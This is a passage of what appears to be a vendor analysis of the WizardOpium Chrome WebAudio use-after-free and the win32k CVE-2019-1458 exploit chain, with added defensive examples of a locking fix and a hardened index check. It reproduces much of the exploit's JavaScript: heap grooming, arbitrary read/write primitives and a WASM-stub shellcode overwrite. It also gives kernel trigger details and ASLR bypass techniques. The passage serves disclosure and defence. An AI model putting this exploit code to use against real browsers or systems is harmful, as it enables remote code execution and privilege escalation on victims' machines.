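    // Fixed shape: take the same lock the render side holds while it uses
    // the buffer, so destruction cannot overlap a read.
    void SetBuffer(std::unique_ptr<Buffer> b) {
        std::lock_guard<std::mutex> lock(process_lock_);
        buffer_ = std::move(b);
    }

    // Render side: hold process_lock_ for the whole access and tolerate a
    // null buffer, since the setter may have cleared it between calls.
    float Process() {
        std::lock_guard<std::mutex> lock(process_lock_);
        if (!buffer_) return 0.0f;
        float acc = 0.0f;
        for (float s : buffer_->samples) acc += s;
        return acc;
    }

 private:
    std::mutex process_lock_;
    std::unique_ptr<Buffer> buffer_;
};

// Sequential check of the null-buffer path: clearing the buffer and then
// rendering must yield silence, not a dereference of freed memory.
float RenderAfterClear() {
    ConvolverLikeHandler h;
    h.SetBuffer(std::make_unique<Buffer>(16));
    h.SetBuffer(nullptr);
    return h.Process();
}

// Stress the fixed path: one thread renders while another repeatedly nulls
// and re-sets the buffer (the "convolver.buffer = null" loop of the text,
// run against the patched shape). Every render call must observe either a
// whole 64-sample buffer (sum 64) or no buffer (sum 0); the count of such
// calls equals the number of iterations when the locking is correct.
int StressFixedPath(int iterations) {
    ConvolverLikeHandler h;
    h.SetBuffer(std::make_unique<Buffer>(64));
    std::atomic<bool> stop{false};
    std::thread setter([&] {
        while (!stop.load()) {
            h.SetBuffer(nullptr);
            h.SetBuffer(std::make_unique<Buffer>(64));
        }
    });
    int consistent = 0;
    for (int i = 0; i < iterations; ++i) {
        float v = h.Process();
        if (v == 0.0f || v == 64.0f) ++consistent;
    }
    stop.store(true);
    setter.join();
    return consistent;
}
```

The discipline matters more than the lock object: the setter and every render-side reader of `reverb_` and `shared_buffer_` must take the same lock, and the reader must accept the null state the setter creates, since a lock held on one side only protects nothing. Exploiting the unpatched code, by contrast, required no knowledge of this locking at all, only of the allocator that the freed objects lived in.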
This can clearly be seen from the snippets of reverse engineered code below. These functions are used in the exploit to retrieve useful information from internal structures of the allocator, including: the SuperPage address, the PartitionPage address by index inside the SuperPage, the index of the used PartitionPage and the address of the PartitionPage metadata. All constants are taken from [partition_alloc_constants.h](<https://chromium.googlesource.com/chromium/src/+/master/base/allocator/partition_allocator/partition_alloc_constants.h>):

```js
function getSuperPageBase(addr) {
  let superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);
  let superPageBaseMask = ~superPageOffsetMask;
  let superPageBase = addr & superPageBaseMask;
  return superPageBase;
}

function getPartitionPageBaseWithinSuperPage(addr, partitionPageIndex) {
  let superPageBase = getSuperPageBase(addr);
  let partitionPageBase = partitionPageIndex << BigInt(14);
  let finalAddr = superPageBase + partitionPageBase;
  return finalAddr;
}

function getPartitionPageIndex(addr) {
  let superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);
  let partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);
  return partitionPageIndex;
}

function getMetadataAreaBaseFromPartitionSuperPage(addr) {
  let superPageBase = getSuperPageBase(addr);
  let systemPageSize = BigInt(0x1000);
  return superPageBase + systemPageSize;
}

function getPartitionPageMetadataArea(addr) {
  let superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);
  let partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);
  let pageMetadataSize = BigInt(0x20);
  let partitionPageMetadataPtr = getMetadataAreaBaseFromPartitionSuperPage(addr) + partitionPageIndex * pageMetadataSize;
  return partitionPageMetadataPtr;
}
```

It's interesting that the exploit also uses the relatively new built-in
[BigInt](<https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/BigInt>) class to handle 64-bit values; authors usually use their own primitives in exploits.

At first, the code initiates an OfflineAudioContext and creates a huge number of IIRFilterNode objects that are initialized via two float arrays.

```js
let gcPreventer = [];
let iirFilters = [];

function initialSetup() {
  let audioCtx = new OfflineAudioContext(1, 20, 3000);

  let feedForward = new Float64Array(2);
  let feedback = new Float64Array(1);

  feedback[0] = 1;
  feedForward[0] = 0;
  feedForward[1] = -1;

  for (let i = 0; i < 256; i++)
    iirFilters.push(audioCtx.createIIRFilter(feedForward, feedback));
}
```

After that, the exploit begins the initial stage of exploitation and tries to trigger the UAF bug. For that to work, the exploit creates the objects that are needed for the Reverb component. It creates another huge OfflineAudioContext object and two ConvolverNode objects – a ScriptProcessorNode to start audio processing and an AudioBuffer for the audio channel.

```js
async function triggerUaF(doneCb) {
  let audioCtx = new OfflineAudioContext(2, 0x400000, 48000);
  let bufferSource = audioCtx.createBufferSource();
  let convolver = audioCtx.createConvolver();
  let scriptNode = audioCtx.createScriptProcessor(0x4000, 1, 1);
  let channelBuffer = audioCtx.createBuffer(1, 1, 48000);

  convolver.buffer = channelBuffer;
  bufferSource.buffer = channelBuffer;

  bufferSource.loop = true;
  bufferSource.loopStart = 0;
  bufferSource.loopEnd = 1;

  channelBuffer.getChannelData(0).fill(0);

  bufferSource.connect(convolver);
  convolver.connect(scriptNode);
  scriptNode.connect(audioCtx.destination);

  bufferSource.start();

  let finished = false;

  scriptNode.onaudioprocess = function(evt) {
    let channelDataArray = new Uint32Array(evt.inputBuffer.getChannelData(0).buffer);

    for (let j = 0; j < channelDataArray.length; j++) {
      if (j + 1 < channelDataArray.length && channelDataArray[j] != 0 && channelDataArray[j + 1] != 0) {
        let u64Array = new BigUint64Array(1);
        let u32Array = new Uint32Array(u64Array.buffer);
        u32Array[0] = channelDataArray[j + 0];
        u32Array[1] = channelDataArray[j + 1];

        let leakedAddr = byteSwapBigInt(u64Array[0]);
        if (leakedAddr >> BigInt(32) > BigInt(0x8000))
          leakedAddr -= BigInt(0x800000000000);
        let superPageBase = getSuperPageBase(leakedAddr);

        if (superPageBase > BigInt(0xFFFFFFFF) && superPageBase < BigInt(0xFFFFFFFFFFFF)) {
          finished = true;
          evt = null;

          bufferSource.disconnect();
          scriptNode.disconnect();
          convolver.disconnect();

          setTimeout(function() {
            doneCb(leakedAddr);
          }, 1);

          return;
        }
      }
    }
  };

  audioCtx.startRendering().then(function(buffer) {
    buffer = null;

    if (!finished) {
      finished = true;
      triggerUaF(doneCb);
    }
  });

  while (!finished) {
    convolver.buffer = null;
    convolver.buffer = channelBuffer;
    await later(100); // wait 100 milliseconds
  }
}
```

This function is executed recursively. It fills the audio channel buffer with zeros, starts rendering offline and at the same time runs a loop that nullifies and resets the channel buffer of the ConvolverNode object and tries to trigger the bug. The exploit uses the later() function to simulate the Sleep function, suspend the current thread and let the Render and Audio threads finish execution right on time:

```js
function later(delay) {
  return new Promise(resolve => setTimeout(resolve, delay));
}
```

During execution the exploit checks if the audio channel buffer contains any data that differs from the previously set zeroes.
The existence of such data would mean the UAF was triggered successfully, and at this stage the audio channel buffer should contain a leaked pointer.

The PartitionAlloc memory allocator has a special exploit mitigation that works as follows: when a memory region is freed, it byte-swaps the address of the pointer, and after that the byte-swapped address is added to the FreeList structure. This complicates exploitation because an attempt to dereference such a pointer will crash the process. To bypass this technique the exploit uses the following primitive that simply swaps the pointer back:

```js
function byteSwapBigInt(x) {
  let result = BigInt(0);
  let tmp = x;

  for (let i = 0; i < 8; i++) {
    result = result << BigInt(8);
    result += tmp & BigInt(0xFF);
    tmp = tmp >> BigInt(8);
  }

  return result;
}
```

The exploit uses the leaked pointer to get the address of the SuperPage structure and verifies it. If everything goes to plan, then it should be a raw pointer to a temporary_buffer_ object of the ReverbConvolverStage class, which is passed to the callback function _initialUAFCallback_.

```js
let sharedAudioCtx;
let iirFilterFeedforwardAllocationPtr;

function initialUAFCallback(addr) {
  sharedAudioCtx = new OfflineAudioContext(1, 1, 3000);

  let partitionPageIndexDelta = undefined;
  switch (majorVersion) {
    case 77: // 77.0.3865.75
      partitionPageIndexDelta = BigInt(-26);
      break;
    case 76: // 76.0.3809.87
      partitionPageIndexDelta = BigInt(-25);
      break;
  }

  iirFilterFeedforwardAllocationPtr = getPartitionPageBaseWithinSuperPage(addr, getPartitionPageIndex(addr) + partitionPageIndexDelta) + BigInt(0xFF0);

  triggerSecondUAF(byteSwapBigInt(iirFilterFeedforwardAllocationPtr), finalUAFCallback);
}
```

The exploit uses the leaked pointer to get the address of the raw pointer to the _feedforward__ array with the AudioArray<double> type that is present in the IIRProcessor
object created with IIRFilterNode. This array should be located in the same SuperPage, but in different versions of Chrome this object is created in different PartitionPages, and there is special code inside initialUAFCallback to handle that.

The vulnerability is actually triggered not once but twice. After the address of the right object is acquired, the vulnerability is exploited again. This time the exploit uses two AudioBuffer objects of different sizes, and the previously retrieved address is sprayed inside the larger AudioBuffer. This function also executes recursively.

```js
let floatArray = new Float32Array(10);
let audioBufferArray1 = [];
let audioBufferArray2 = [];
let imageDataArray = [];

async function triggerSecondUAF(addr, doneCb) {
  let counter = 0;
  let numChannels = 1;

  let audioCtx = new OfflineAudioContext(1, 0x100000, 48000);

  let bufferSource = audioCtx.createBufferSource();
  let convolver = audioCtx.createConvolver();

  let bigAudioBuffer = audioCtx.createBuffer(numChannels, 0x100, 48000);
  let smallAudioBuffer = audioCtx.createBuffer(numChannels, 0x2, 48000);

  smallAudioBuffer.getChannelData(0).fill(0);

  for (let i = 0; i < numChannels; i++) {
    let channelDataArray = new BigUint64Array(bigAudioBuffer.getChannelData(i).buffer);
    channelDataArray[0] = addr;
  }

  bufferSource.buffer = bigAudioBuffer;
  convolver.buffer = smallAudioBuffer;

  bufferSource.loop = true;
  bufferSource.loopStart = 0;
  bufferSource.loopEnd = 1;

  bufferSource.connect(convolver);
  convolver.connect(audioCtx.destination);

  bufferSource.start();

  let finished = false;

  audioCtx.startRendering().then(function(buffer) {
    buffer = null;

    if (finished) {
      audioCtx = null;

      setTimeout(doneCb, 200);
      return;
    } else {
      finished = true;

      setTimeout(function() {
        triggerSecondUAF(addr, doneCb);
      }, 1);
    }
  });

  while (!finished) {
    counter++;

    convolver.buffer = null;

    await later(1); // wait 1 millisecond

    if (finished)
      break;

    for (let i = 0; i < iirFilters.length; i++) {
      floatArray.fill(0);
      iirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);

      if (floatArray[0] != 3.1415927410125732) {
        finished = true;

        audioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));
        audioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));

        bufferSource.disconnect();
        convolver.disconnect();

        return;
      }
    }

    convolver.buffer = smallAudioBuffer;

    await later(1); // wait 1 millisecond
  }
}
```

This time the exploit uses the function _getFrequencyResponse()_ to check if exploitation was successful. The function creates an array of frequencies that is filled with a Nyquist filter, and the source array for the operation is filled with zeroes.

```cpp
void IIRDSPKernel::GetFrequencyResponse(int n_frequencies,
                                        const float* frequency_hz,
                                        float* mag_response,
                                        float* phase_response) {
  ...
  Vector<float> frequency(n_frequencies);
  double nyquist = this->Nyquist();
  // Convert from frequency in Hz to normalized frequency (0 -> 1),
  // with 1 equal to the Nyquist frequency.
  for (int k = 0; k < n_frequencies; ++k)
    frequency[k] = frequency_hz[k] / nyquist;
  ...
```

If the resulting array contains a value other than **π**, it means exploitation was successful. If that's the case, the exploit stops its recursion and executes the function _finalUAFCallback_ to allocate the audio channel buffer again and reclaim the previously freed memory. This function also repairs the heap to prevent possible crashes by allocating various objects of different sizes and performing defragmentation of the heap.
The exploit also creates a BigUint64Array, which is used later to create an arbitrary read/write primitive.

```js
async function finalUAFCallback() {
  for (let i = 0; i < 256; i++) {
    floatArray.fill(0);

    iirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);

    if (floatArray[0] != 3.1415927410125732) {
      await collectGargabe();

      audioBufferArray2 = [];

      for (let j = 0; j < 80; j++)
        audioBufferArray1.push(sharedAudioCtx.createBuffer(1, 2, 10000));

      iirFilters = new Array(1);
      await collectGargabe();

      for (let j = 0; j < 336; j++)
        imageDataArray.push(new ImageData(1, 2));
      imageDataArray = new Array(10);
      await collectGargabe();

      for (let j = 0; j < audioBufferArray1.length; j++) {
        let auxArray = new BigUint64Array(audioBufferArray1[j].getChannelData(0).buffer);
        if (auxArray[0] != BigInt(0)) {
          kickPayload(auxArray);
          return;
        }
      }

      return;
    }
  }
}
```

Heap defragmentation is performed with multiple calls to the improvised _collectGargabe()_ function (spelled that way in the exploit), which creates a huge ArrayBuffer in a loop.

```js
function collectGargabe() {
  let promise = new Promise(function(cb) {
    let arg;
    for (let i = 0; i < 400; i++)
      new ArrayBuffer(1024 * 1024 * 60).buffer;
    cb(arg);
  });
  return promise;
}
```

After those steps, the exploit executes the function _kickPayload()_, passing the previously created BigUint64Array containing the raw pointer address of the previously freed AudioArray's data.

```js
async function kickPayload(auxArray) {
  let audioCtx = new OfflineAudioContext(1, 1, 3000);
  let partitionPagePtr = getPartitionPageMetadataArea(byteSwapBigInt(auxArray[0]));
  auxArray[0] = byteSwapBigInt(partitionPagePtr);
  let i = 0;
  do {
    gcPreventer.push(new ArrayBuffer(8));
    if (++i > 0x100000)
      return;
  } while (auxArray[0] != BigInt(0));
  let freelist = new BigUint64Array(new ArrayBuffer(8));
  gcPreventer.push(freelist);
  ...
```

The exploit manipulates the PartitionPage metadata of the freed object to achieve the following behavior. If the address of another object is written in the BigUint64Array at index zero, and if a new 8-byte object is then created and the value located at index 0 is read back, then the value located at the previously set address will be read. If something is written at index 0 at this stage, then this value will be written to the previously set address instead.

```js
function read64(rwHelper, addr) {
  rwHelper[0] = addr;
  var tmp = new BigUint64Array;
  tmp.buffer;
  gcPreventer.push(tmp);
  return byteSwapBigInt(rwHelper[0]);
}

function write64(rwHelper, addr, value) {
  rwHelper[0] = addr;
  var tmp = new BigUint64Array(1);
  tmp.buffer;
  tmp[0] = value;
  gcPreventer.push(tmp);
}
```

After the building of the arbitrary read/write primitives comes the final stage – executing the code. The exploit achieves this by using a popular technique that exploits the WebAssembly (WASM) functionality. Google Chrome currently allocates pages for just-in-time (JIT) compiled code with read/write/execute (RWX) privileges, and this can be used to overwrite them with shellcode. At first, the exploit initiates a "dummy" WASM module, and this results in the allocation of memory pages for JIT compiled code.

```js
const wasmBuffer = new Uint8Array([...]);
const wasmBlob = new Blob([wasmBuffer], {
  type: "application/wasm"
});

const wasmUrl = URL.createObjectURL(wasmBlob);
var wasmFuncA = undefined;
WebAssembly.instantiateStreaming(fetch(wasmUrl), {}).then(function(result) {
  wasmFuncA = result.instance.exports.a;
});
```

To execute the exported function _wasmFuncA_, the exploit creates a FileReader object. When this object is initiated with data, it creates a FileReaderLoader object internally.
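The `freelist` array that `read64()` and `write64()` work through holds PartitionAlloc freelist links, which the allocator stores byte-swapped, as described above for `byteSwapBigInt()`. The following added example, written for this page and not Chromium or exploit code, reduces that hardening to its arithmetic in C++ and shows why an undecoded link cannot be dereferenced on x86-64. `EncodeFreelistEntry`, `IsCanonical` and the sample heap address are constructed for the illustration.

```cpp
// Added example (not Chromium code): the freelist-pointer hardening the text
// describes, reduced to its arithmetic. PartitionAlloc stores freed-slot links
// byte-swapped; a stale or leaked link that is dereferenced without decoding
// is a non-canonical x86-64 address and faults instead of being usable.
#include <cstdint>

// Byte-swap a 64-bit value, the transformation applied to freelist entries.
// The loop mirrors the page's description (shift in one byte per step).
std::uint64_t EncodeFreelistEntry(std::uint64_t ptr) {
    std::uint64_t out = 0;
    for (int i = 0; i < 8; ++i) {
        out = (out << 8) | (ptr & 0xFF);
        ptr >>= 8;
    }
    return out;
}

// Decoding is the same operation: a byte swap is its own inverse.
std::uint64_t DecodeFreelistEntry(std::uint64_t encoded) {
    return EncodeFreelistEntry(encoded);
}

// x86-64 canonical form: bits 63..47 must all be equal. User-mode heap
// addresses have them all zero; anything else faults on dereference.
bool IsCanonical(std::uint64_t addr) {
    std::uint64_t top = addr >> 47;
    return top == 0 || top == 0x1FFFF;
}

// Constructed sample: a typical user-mode heap address on an x64 system.
constexpr std::uint64_t kSampleHeapPtr = 0x00007F1234567890ULL;

// Would a raw (undecoded) freelist link for this address be dereferenceable?
bool EncodedLinkIsDereferenceable(std::uint64_t ptr) {
    return IsCanonical(EncodeFreelistEntry(ptr));
}
```

The encoding is its own inverse, so it is a crash-early measure rather than a secret: a stale or leaked link used without decoding lands in the non-canonical hole and faults immediately, which is why every link the exploit reads passes through `byteSwapBigInt()` first. It does not stop code that already has an arbitrary read from decoding links, which is exactly the stage the exploit has reached here.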
If you can parse PartitionAlloc allocator structures and know the size of the next object that will be allocated, you can predict which address it will be allocated to. The exploit uses the _getPartitionPageFreeListHeadEntryBySlotSize()_ function with the provided size and gets the address of the next free block that will be allocated by FileReaderLoader.

```js
let fileReader = new FileReader;
let fileReaderLoaderSize = 0x140;
let fileReaderLoaderPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);
if (!fileReaderLoaderPtr)
  return;

fileReader.readAsArrayBuffer(new Blob([]));

let fileReaderLoaderTestPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);
if (fileReaderLoaderPtr == fileReaderLoaderTestPtr)
  return;
```

The exploit obtains this address twice to find out if the FileReaderLoader object was created and if the exploit can continue execution.
The exploit sets the exported WASM function to be a callback for a FileReader event (in this case, an onerror callback), and because the FileReader type is derived from EventTargetWithInlineData, it can be used to get the addresses of all its events and the address of the JIT compiled exported WASM function.

```js
fileReader.onerror = wasmFuncA;

let fileReaderPtr = read64(freelist, fileReaderLoaderPtr + BigInt(0x10)) - BigInt(0x68);

let vectorPtr = read64(freelist, fileReaderPtr + BigInt(0x28));
let registeredEventListenerPtr = read64(freelist, vectorPtr);
let eventListenerPtr = read64(freelist, registeredEventListenerPtr);
let eventHandlerPtr = read64(freelist, eventListenerPtr + BigInt(0x8));
let jsFunctionObjPtr = read64(freelist, eventHandlerPtr + BigInt(0x8));

let jsFunctionPtr = read64(freelist, jsFunctionObjPtr) - BigInt(1);
let sharedFuncInfoPtr = read64(freelist, jsFunctionPtr + BigInt(0x18)) - BigInt(1);
let wasmExportedFunctionDataPtr = read64(freelist, sharedFuncInfoPtr + BigInt(0x8)) - BigInt(1);
let wasmInstancePtr = read64(freelist, wasmExportedFunctionDataPtr + BigInt(0x10)) - BigInt(1);

let stubAddrFieldOffset = undefined;
switch (majorVersion) {
  case 77:
    stubAddrFieldOffset = BigInt(0x8) * BigInt(16);
    break;
  case 76:
    stubAddrFieldOffset = BigInt(0x8) * BigInt(17);
    break;
}

let stubAddr = read64(freelist, wasmInstancePtr + stubAddrFieldOffset);
```

The variable stubAddr contains the address of the page with the stub code that jumps to the JIT compiled WASM function. At this stage it's sufficient to overwrite it with shellcode. To do so, the exploit uses the function _getPartitionPageFreeListHeadEntryBySlotSize()_ again to find the next free block of 0x20 bytes, which is the size of the structure for the ArrayBuffer object.
This object is created when the exploit creates a new audio buffer.\n \n \n let arrayBufferSize = 0x20;\n let arrayBufferPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, arrayBufferSize);\n if (!arrayBufferPtr)\n \treturn;\n \n let audioBuffer = audioCtx.createBuffer(1, 0x400, 6000);\n gcPreventer.push(audioBuffer);\n\nThe exploit uses arbitrary read/write primitives to get the address of the DataHolder class that contains the raw pointer to the data and size of the audio buffer. The exploit overwrites this pointer with stubAddr and sets a huge size.\n \n \n let dataHolderPtr = read64(freelist, arrayBufferPtr + BigInt(0x8));\n \n write64(freelist, dataHolderPtr + BigInt(0x8), stubAddr);\n write64(freelist, dataHolderPtr + BigInt(0x10), BigInt(0xFFFFFFF));\n\nNow all that's needed is to implant a Uint8Array object into the memory of this audio buffer and place shellcode there along with the Portable Executable that will be executed by the shellcode.\n \n \n let payloadArray = new Uint8Array(audioBuffer.getChannelData(0).buffer);\n payloadArray.set(shellcode, 0);\n payloadArray.set(peBinary, shellcode.length);\n\nTo prevent the possibility of a crash the exploit clears the pointer to the top of the FreeList structure used by the PartitionPage.\n \n \n write64(freelist, partitionPagePtr, BigInt(0));\n\nNow, in order to execute the shellcode, it's enough to call the exported WASM function.\n \n \n try {\n \twasmFuncA();\n } catch (e) {}\n\n## Microsoft Windows elevation of privilege exploit\n\nThe shellcode appeared to be a Reflective PE loader for the Portable Executable module that was also present in the exploit. This module mostly consisted of the code to escape Google Chrome's sandbox by exploiting the Windows kernel component win32k for the elevation of privileges and it was also responsible for downloading and executing the actual malware. 
On closer analysis, we found that the exploited vulnerability was in fact a zero-day. We notified Microsoft Security Response Center and they assigned it CVE-2019-1458 and fixed the vulnerability. The win32k component has something of bad reputation. It has been present since Windows NT 4.0 and, according to Microsoft, it is responsible for more than 50% of all kernel security bugs. In the last two years alone Kaspersky has found five zero-days in the wild that exploited win32k vulnerabilities. That's quite an interesting statistic considering that since the release of Windows 10, Microsoft has implemented a number of mitigations aimed at complicating exploitation of win32k vulnerabilities and the majority of zero-days that we found exploited versions of Microsoft Windows prior to the release of Windows 10 RS4. The elevation of privilege exploit used in Operation WizardOpium was built to support Windows 7, Windows 10 build 10240 and Windows 10 build 14393. It's also important to note that Google Chrome has a special security feature called [Win32k lockdown](<https://googleprojectzero.blogspot.com/2016/11/breaking-chain.html>). This security feature eliminates the whole win32k attack surface by disabling access to win32k syscalls from inside Chrome processes. Unfortunately, Win32k lockdown is only supported on machines running Windows 10. So, it's fair to assume that Operation WizardOpium targeted users running Windows 7.\n\nCVE-2019-1458 is an Arbitrary Pointer Dereference vulnerability. In win32k Window objects are represented by a tagWND structure. There are also a number of classes based on this structure: ScrollBar, Menu, Listbox, Switch and many others. The FNID field of tagWND structure is used to distinguish the type of class. Different classes also have various extra data appended to the tagWND structure. This extra data is basically just different structures that often include kernel pointers. 
Besides that, in the win32k component there's a syscall SetWindowLongPtr that can be used to set this extra data (after validation of course). It's worth noting that SetWindowLongPtr was related to a number of vulnerabilities in the past (e.g., CVE-2010-2744, CVE-2016-7255, and CVE-2019-0859). There's a [common issue](<https://securelist.com/new-win32k-zero-day-cve-2019-0859/90435/>) when pre-initialized extra data can lead to system procedures incorrectly handling. In the case of CVE-2019-1458, the validation performed by SetWindowLongPtr was just insufficient.\n \n \n xxxSetWindowLongPtr(tagWND *pwnd, int index, QWORD data, ...)\n \t...\n \tif ( (int)index >= gpsi->mpFnid_serverCBWndProc[(pwnd->fnid & 0x3FFF) - 0x29A] - sizeof(tagWND) )\n \t\t...\n \t\textraData = (BYTE*)tagWND + sizeof(tagWND) + index\n \t\told = *(QWORD*)extraData;\n \t\t*(QWORD*)extraData = data;\n \t\treturn old;\n\nA check for the index parameter would have prevented this bug, but prior to the patch the values for FNID_DESKTOP, FNID_SWITCH, FNID_TOOLTIPS inside the mpFnid_serverCBWndProc table were not initialized, rendering this check useless and allowing the kernel pointers inside the extra data to be overwritten.\n\nTriggering the bug is quite simple: at first, you create a Window, then NtUserMessageCall can be used to call any system class window procedure.\n \n \n gpsi->mpFnidPfn[(dwType + 6) & 0x1F]((tagWND *)wnd, msg, wParam, lParam, resultInfo);\n\nIt's important to provide the right message and dwType parameters. The message needs to be equal to WM_CREATE. dwType is converted to fnIndex internally with the following calculation: (dwType + 6) & 0x1F. The exploit uses a dwType equal to 0xE0. 
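To make the validation failure concrete, here is an added model of the SetWindowLongPtr index check (not win32k code, and not Microsoft's patch): `SIZEOF_TAGWND`, `EXTRA_BYTES`, the table length and the two FNID values are placeholders, the pre-patch rule assumes a signed comparison, and the hardened variant is a suggestion added here.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of the xxxSetWindowLongPtr index validation discussed
 * above. Added illustration, not win32k code: sizeof(tagWND), the table
 * length, the FNID values and the amount of extra data are placeholders. */

#define FNID_BASE         0x29A                /* matches the "- 0x29A" in the decompilation */
#define FNID_COUNT        0x20                 /* placeholder table length */
#define SIZEOF_TAGWND     0x100                /* placeholder, not the real size */
#define EXTRA_BYTES       32                   /* placeholder extra-data size per window */
#define FNID_MODEL_MENU   (FNID_BASE + 2)      /* placeholder FNID with an initialized entry */
#define FNID_MODEL_SWITCH (FNID_BASE + 6)      /* placeholder FNID whose entry is left at 0 */

/* The fixed tagWND part is reduced to its fnid; the class-specific extra
 * data follows it. extra[0] stands in for the kernel pointer that the
 * article says a Switch window keeps at index zero. */
typedef struct {
    uint16_t fnid;
    uint64_t extra[EXTRA_BYTES / 8];
} model_wnd;

/* gpsi->mpFnid_serverCBWndProc: total byte size (tagWND + private part) of
 * each system class. A zero entry models the uninitialized pre-patch state
 * of the FNID_DESKTOP / FNID_SWITCH / FNID_TOOLTIPS slots. */
typedef struct {
    uint32_t mpFnid_serverCBWndProc[FNID_COUNT];
} model_gpsi;

static uint32_t class_size_of(const model_gpsi *gpsi, uint16_t fnid) {
    unsigned slot = (fnid & 0x3FFF) - FNID_BASE;
    return slot < FNID_COUNT ? gpsi->mpFnid_serverCBWndProc[slot] : 0;
}

/* The cbwndExtra-style check that applies on both paths: an aligned QWORD
 * inside the window's own extra data. */
static int within_extra(int index) {
    return index >= 0 && index % 8 == 0 && (unsigned)index + 8 <= EXTRA_BYTES;
}

/* Pre-patch rule, transcribed from the decompilation with a signed compare:
 * a user-mode write must land at or above the class-private region, i.e.
 * index >= class size - sizeof(tagWND). With an uninitialized (zero) entry
 * that bound is negative, so every index passes, index 0 included. */
static int index_allowed_prepatch(const model_gpsi *gpsi, uint16_t fnid, int index) {
    int reserved = (int)class_size_of(gpsi, fnid) - (int)SIZEOF_TAGWND;
    return within_extra(index) && index >= reserved;
}

/* Hardened rule (added here; the vendor's fix was to initialize the table):
 * a table entry smaller than tagWND cannot describe a real class, so fail
 * closed instead of deriving a negative bound from it. */
static int index_allowed_hardened(const model_gpsi *gpsi, uint16_t fnid, int index) {
    uint32_t class_size = class_size_of(gpsi, fnid);
    if (class_size < SIZEOF_TAGWND)
        return 0;                                    /* uninitialized or bogus entry */
    int reserved = (int)(class_size - SIZEOF_TAGWND);
    return within_extra(index) && index >= reserved;
}

/* Write path: returns 1 and reports the previous value if the store happened. */
static int model_set_window_long_ptr(const model_gpsi *gpsi, model_wnd *wnd, int index,
                                     uint64_t data, uint64_t *old, int hardened) {
    int ok = hardened ? index_allowed_hardened(gpsi, wnd->fnid, index)
                      : index_allowed_prepatch(gpsi, wnd->fnid, index);
    if (!ok)
        return 0;
    uint64_t *slot = (uint64_t *)((uint8_t *)wnd->extra + index);
    *old = *slot;
    *slot = data;
    return 1;
}

int main(void) {
    model_gpsi gpsi;
    memset(&gpsi, 0, sizeof gpsi);                                  /* every slot "uninitialized" */
    gpsi.mpFnid_serverCBWndProc[FNID_MODEL_MENU - FNID_BASE] = SIZEOF_TAGWND + 16;
    /* FNID_MODEL_SWITCH deliberately stays 0 */

    model_wnd sw = { FNID_MODEL_SWITCH, { 0x1000, 0, 0, 0 } };       /* constructed "kernel pointer" */
    uint64_t old = 0;
    printf("pre-patch, index 0 on switch window: %s\n",
           model_set_window_long_ptr(&gpsi, &sw, 0, 0x2000, &old, 0) ? "written" : "rejected");
    printf("hardened,  index 0 on switch window: %s\n",
           model_set_window_long_ptr(&gpsi, &sw, 0, 0x3000, &old, 1) ? "written" : "rejected");
    printf("pre-patch, index 0 on menu window:   %s\n",
           index_allowed_prepatch(&gpsi, FNID_MODEL_MENU, 0) ? "allowed" : "rejected");
    return 0;
}
```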
A dwType of 0xE0 results in an fnIndex equal to 6, which is the function index of _xxxSwitchWndProc_, and the WM_CREATE message sets the FNID field to FNID_SWITCH.

```c
LRESULT xxxSwitchWndProc(tagWND *wnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
    ...
    pti = *(tagTHREADINFO **)&gptiCurrent;
    if ( wnd->fnid != FNID_SWITCH )
    {
        if ( wnd->fnid || wnd->cbwndExtra + 296 < (unsigned int)gpsi->mpFnid_serverCBWndProc[6] )
            return 0i64;
        if ( msg != 1 )
            return xxxDefWindowProc(wnd, msg, wParam, lParam);
        if ( wnd[1].head.h )
            return 0i64;
        wnd->fnid = FNID_SWITCH;
    }
    switch ( msg )
    {
        case WM_CREATE:
            zzzSetCursor(wnd->pcls->spcur, pti, 0i64);
            break;
        case WM_CLOSE:
            xxxSetWindowPos(wnd, 0, 0);
            xxxCancelCoolSwitch();
            break;
        case WM_ERASEBKGND:
        case WM_FULLSCREEN:
            pti->ptl = (_TL *)&pti->ptl;
            ++wnd->head.cLockObj;
            xxxPaintSwitchWindow(wnd, pti, 0i64);
            ThreadUnlock1();
            return 0i64;
    }
    return xxxDefWindowProc(wnd, msg, wParam, lParam);
}
```

The vulnerability in _NtUserSetWindowLongPtr_ can then be used to overwrite the extra data at index zero, which happens to be a pointer to a structure containing information about the Switch Window. In other words, the vulnerability makes it possible to set an arbitrary kernel pointer that will be treated as this structure.

At this stage it's enough to call _NtUserMessageCall_ again, but this time with a message equal to WM_ERASEBKGND. This results in the execution of the function _xxxPaintSwitchWindow_, which increments and decrements a couple of integers located by the pointer that we previously set.

```asm
sub [rdi+60h], ebx
add [rdi+68h], ebx
...
sub [rdi+5Ch], ecx
add [rdi+64h], ecx
```

An important condition for triggering the exploitable code path is that the ALT key needs to be pressed.

Exploitation is performed by abusing Bitmaps. For successful exploitation a few Bitmaps need to be allocated next to each other, and their kernel addresses need to be known. To achieve this, the exploit uses two common kernel ASLR bypass techniques. For Windows 7 and Windows 10 build 10240 (Threshold 1) the Bitmap kernel addresses are leaked via the GdiSharedHandleTable [technique](<https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives>): in older versions of the OS there is a special table available at the user level that holds the kernel addresses of all GDI objects present in the process. This particular technique was patched in Windows 10 build 14393 (Redstone 1), so for this version the exploit uses another common [technique](<https://labs.f-secure.com/archive/a-tale-of-bitmaps/>) that abuses Accelerator Tables (patched in Redstone 2). It involves creating an Accelerator Table object, leaking its kernel address from the gSharedInfo HandleTable available at the user level, and then freeing the Accelerator Table object and allocating a Bitmap that reuses the same memory address.

